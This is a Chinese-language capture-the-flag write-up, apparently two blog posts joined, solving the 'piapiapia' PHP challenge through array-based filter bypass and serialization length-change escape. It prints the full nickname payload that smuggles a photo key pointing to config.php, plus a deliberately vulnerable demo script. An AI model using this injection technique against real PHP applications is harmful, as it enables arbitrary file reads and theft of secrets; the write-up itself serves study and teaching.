2016 piapiapia 数组绕过

0x00.感悟

     写完这道题,我感觉到了扫源码的重要性。暑假复现的那些CVE,有的就是任意文件读取,有的是任意命令执行,这些应该都是通过代码审计,得到的漏洞。也就和我们的CTF差不多了。
     但是我们扫目录,字典是个大问题,我目前还没有搞懂为什么有些文件,只能被一些特定的软件扫到。比如这道题,这个dirsearch,连www.zip这样的变态目录都能扫出来,为什么扫不出update.php这样极其常见的目录。而且题目的源码,就只能用dirsearch扫到,dirb和nikto就不行。但nikto却可以扫到另一道题“fakebook”的源码。有人说是字典的问题,可我感觉这些常见的目录,这些软件的字典里,应该都有吧。(这些软件不是很强的吗!)

0x01.知识点

1.1 url传递数组

当我们要向服务器传递数组时,我们可以通过
http://127.0.0.1/index.php?a[]=hello&a[]=world
来传递,这样,在后端,
$a = $_GET['a'];
就可以接收到 $a[0]=“hello”, $a[1]=“world”。

1.2 数组的遍历

  • foreach (array_expression as $value)

  • foreach (array_expression as $key => $value)

第一种格式遍历给定的 array_expression 数组。每次循环中,当前单元的值被赋给 $value 并且数组内部的指针向前移一步(因此下一次循环中将会得到下一个单元)。

第二种格式做同样的事,只除了当前单元的值赋给$value外,键名也会在每次循环中被赋给变量 $key。

<?php
$arr = array(1, 2, 3, 4);
foreach ($arr as &$value) {
    $value = $value * 2;
}
                $ arr is now array(2, 4, 6, 8)
unset($value);  最后取消掉引用
?>
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
$a = array(
    "one" => 1,
    "two" => 2,
    "three" => 3,
    "seventeen" => 17
);
foreach ($a as $k => $v) {
    echo "\$a[$k] => $v.\n";
}
输出 $a[one] => 1. $a[two] => 2. $a[three] => 3. $a[seventeen] => 17.
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10

1.3数组绕过正则即相关

  1. md5(Array()) = null
  2. sha1(Array()) = null
  3. ereg(pattern,Array()) =null
  4. preg_match(pattern,Array()) = false
  5. strcmp(Array(), “abc”) =null
  6. strpos(Array(),“abc”) = null
  7. strlen(Array()) = null

1.4 改变序列化长度,导致反序列化漏洞

unserialize(str) 会忽略能够正常序列化的字符串后面的字符串。也是这到题最厉害的一点。像这样的一个字符串,我们可以可以不用反序列话,就能知道它反序列化后是什么,因为它是有规律的。
a:4:{s:5:“phone”;s:11:“11111111111”;s:5:“email”;s:11:“1a2s@qq.com”;s:8:“nickname”;s:3:“123”;s:5:“photo”;s:39:“upload/f3b94e88bd1bd325af6f62828c8785dd”;}
a:4指的是由一个数组序列化而来,并且有4个值。如果是对象的话,好像是把a改成了O。然后就是一个键值名,一个变量值:
s:5:"phone";第一个键值名,是string类型的,长度为五,s:11:"11111111111";第一个变量值,string类型,长度为11.这就是它的规律。如果我们在这个序列化字符串的后面,再加上一些字符,后面的字符是不会被反序列化的

0x02 实践

2.1 找源码

我们先扫描,我可是记住了,不管啥题,先扫描。而且还的不同软件多扫几遍,防止遗漏。反正这道题,我用御剑是扫不出来,我给字典里加上www.zip还是扫不出来,不知道为什么!我们用dirsearch扫描一下,让后发现源码。

2.2 审计

打开后,开始审计,反正我是不会 。其实做的题多了,也就能发现,来来回回也就那几个函数。我们可以在config.php里看见flag,当后在profile.php里看见file_get_contents()函数,而且我发现一般有这个函数的同时,都会有序列化的事情。

profile = unserialize($profile);
		$phone = $profile['phone'];
		$email = $profile['email'];
		$nickname = $profile['nickname'];
		$photo = base64_encode(file_get_contents($profile['photo']));
  • 1
  • 2
  • 3
  • 4
  • 5

当时光看代码,就看了一上午,感谢自己当时学了点C++面向对象的知识,虽然语言不一样,但思想是一样的。
然后再update里可以控制 $profile[‘nicjanme’] $profile[‘photo’]。那么思路就很明确了:让 $profile[‘photo’]的值为“config.php”,这这样就可以得到falg了。 我们可以利用反序列化漏洞,在nickname里加上";}s:5:"photo";s:10:"config.php";} ,这样它后面的upload什么的,就不是再反序列化了。我们可以看见在update.php里,代码是通过

if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)
			die('Invalid nickname');
  • 1
  • 2

来控制nickname的值的,但是如果我们传过去的是一个数组的话,这个过滤就凉了。但是传递过去之后,会先把序列化的值,保存在数据中:
在这里插入图片描述
而保存之前,还会再次过滤:
在这里插入图片描述在这里插入图片描述这也正式我们可以利用的地方,因为我们想让“";}s:5:“photo”;s:10:“config.php”;”被拼接在反序列化字符串里,而不是被当做nickname的值。因为“";}s:5:“photo”;s:10:“config.php”;}”是34个字符。那么我们就传递34个where,在序列化后,存入数据库时,会把where变成hacker,长度加一。这样代表nickname的“s”,就只能代表前34个hacker,即{s:6*34:hacker...kacker";}s:5:"photo";s:10:"config.php";}s:39:"upload/804f743824c0451b2f60d81b63b6a900";} 因为本来6*34个字符的长度=34个where+“length(s:39:“upload/804f743824c0451b2f60d81b63b6a900”;})”,所以反序列化后, $profile[‘nicjanme’] 就等于config.php了。

2.3 传参

在这里插入图片描述在这里插入图片描述
在这里插入图片描述

二:

道题感觉很难,要是比赛中出这种题我肯定做不来,所以我耐着性子慢慢分析这道题,最后居然自己做了个七七八八,只剩下一点点就完全做出来了。

下面把我做这道题时的思路一步一步记录下来,希望能够彻底巩固。

一,信息收集

拿到题没有什么思路,先找找线索,从源码和题目里没看到什么提示。

试了试万能密码登录也无果,然后试着扫目录和用burp抓包找提示。

发现有www.zip源码泄露。

二,分析源码

对于代码审计一我直以来都是懵逼的,特别是看到大佬写的这道题代码量很少时,我的内心是崩溃的。

一个文件一个文件看对于我这种菜鸡是不现实的,直接用seay扫,看到报告我松了口气,只有四个可能的漏洞。在这里插入图片描述
然后开始分析各个漏洞的可能性,我一眼就看到了第三个的file_get_contents()函数,这个函数因为考的最多,而且我也比较熟悉。

然后打开profile.php开始分析,在这里插入图片描述
可以发现,这个函数接受的是profile数组中的photo的值,只要这个参数是可控的我们就能实现任意文件读取。

于是我开始寻找$profile['photo'])这个变量是从哪里来的,
在这里插入图片描述
最后发现来自于这行代码,可惜的是不可控。

$profile['photo'] = 'upload/' . md5($file['name']);
  • 1

在寻找的过程中我还发现comfig.php里面有flag。
在这里插入图片描述
因为我们down的代码和服务器上的代码是不一样的,所以这里的flag在服务器上应该记录的是我们需要的flag,结合之前的分析,只要使用file_get_contents()函数读取config.php就能拿到flag。

但是问题是这个函数里的参数不可控,这个时候就要用到这道题的知识点——PHP序列化长度变化导致尾部字符逃逸

三,PHP序列化长度变化导致尾部字符逃逸

在做这道题之前我是不知道这个知识点的,看了大佬的解读,然后自己敲了一遍很快就理解了这个知识点。

这里我看的是https://www.jianshu.com/p/3b44e72444c1的例子

原理很简单:

1,下面是正常序列化一个数组:
在这里插入图片描述2,然后在单词Northind中间加了几个字符"""";},但是前面的部分a:1: {i:0;s:8:"North"""";}刚好符合反序列化的格式,所以后面的部分ind";}' ;就被抛弃了。
在这里插入图片描述
3,应用,利用该漏洞修改签名。

<?php

	$username = $_GET['username'];
	$sign = "hi guys";
	$user = array($username, $sign);

	$seri = bad_str(serialize($user));

	echo $seri;

	// echo "<br>";

	$user=unserialize($seri);

	echo $user[0];
	echo "<br>";
	echo "<br>";
	echo $user[1];


	function bad_str($string){
		return preg_replace('/\'/', 'no', $string);
	}
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24

在这里插入图片描述

这里的username是我们可控的,而sign签名是固定的hi guys,我们先正常传参username=admin

在这里插入图片描述

但是如果在用户名处加上单引号,则会被程序转义成no,由于长度错误导致反序列化时出错。
在这里插入图片描述

我们可以尝试利用这个错误来修改签名:

替换前,我们传入username=admin'''''''''''''''''''";i:1;s:5:"no hi";}

a:2:{i:0;s:43:“admin’’’’’’’’’’’’’’’’’’’”;i:1;s:5:“no hi”;}";i:1;s:7:“hi guys”;}

红色为用户名部分,其中";i:1;s:5:"no hi";}是要逃逸的。蓝色为要被丢弃的部分。

替换后,单引号'被替换为no:

a:2:{i:0;s:43:“adminnonononononononononononononononononono”;i:1;s:5:“no hi”;}";i:1;s:7:“hi guys”;}

红色为用户名部分,因为替换前用户名长度等于替换后的,所以能正常反序列化。蓝色为被丢弃的部分。
在这里插入图片描述可以看到,签名部分从hi guys变成了no hi

四,利用该漏洞解题

因为这道题的username恰好也是我们可控的,而使用file_get_content()函数之前也进行了序列化,所以可以利用这个漏洞。
在这里插入图片描述
在这里插入图片描述
这里我们输入的username还经过了过滤,如果输入where被替换为hacker会导致长度加1。
在这里插入图片描述

先看看这里序列化的格式是什么

<?php
$profile['phone'] = '01234567890';
$profile['email'] = '1@1.1';
$profile['nickname'] = 'admin';
$profile['photo'] = 'upload/01234567890123456789012345678912';
echo serialize($profile);
#a:4:{s:5:"phone";s:11:"01234567890";s:5:"email";s:5:"1@1.1";s:8:"nickname";s:5:"admin";s:5:"photo";s:39:"upload/01234567890123456789012345678912";}
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7

可以看到序列化之后应该是这个格式,因为MD5之后肯定是32位,所以我就直接用长度为32的数字代替了,其他参数都是我注册时使用的参数。

a:4:{s:5:"phone";s:11:"01234567890";s:5:"email";s:5:"1@1.1";s:8:"nickname";s:5:"admin";s:5:"photo";s:39:"upload/01234567890123456789012345678912";}

我们的目的就是把upload/01234567890123456789012345678912改为"config.php,而";}s:5:“photo”;s:10:“config.php”;}是34个字符,所以只需要在前面加上34个where就行了。我们传进去nickname之后,序列化之后应该是以下格式:

替换前:
a:4:{s:5:“phone”;s:11:“01234567890”;s:5:“email”;s:5:“1@1.1”;s:8:“nickname”;s:5:“wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere”;}s:5:“photo”;s:10:“config.php”;}";s:5:“photo”;s:39:“upload/01234567890123456789012345678912”;}

红色为我们输入的用户名部分,蓝色为被丢弃的部分。

替换后:
a:4:{s:5:“phone”;s:11:“01234567890”;s:5:“email”;s:5:“1@1.1”;s:8:“nickname”;s:5:“hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker”;}s:5:“photo”;s:10:“config.php”;}";s:5:“photo”;s:39:“upload/01234567890123456789012345678912”;}

红色为替换后的用户名部分,蓝色为被丢弃的部分。

所以构造payload为wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}
就可以实现以上目的

注册之后登陆,进入到update.php页面,bp抓包把nickname改为数组。
在这里插入图片描述
最后访问profile.php查看源码,把base64的内容解码就可以得到flag了。

在这里插入图片描述在这里插入图片描述

posted @ 2020-09-28 20:56  huhuf6  阅读(172)  评论(0编辑  收藏  举报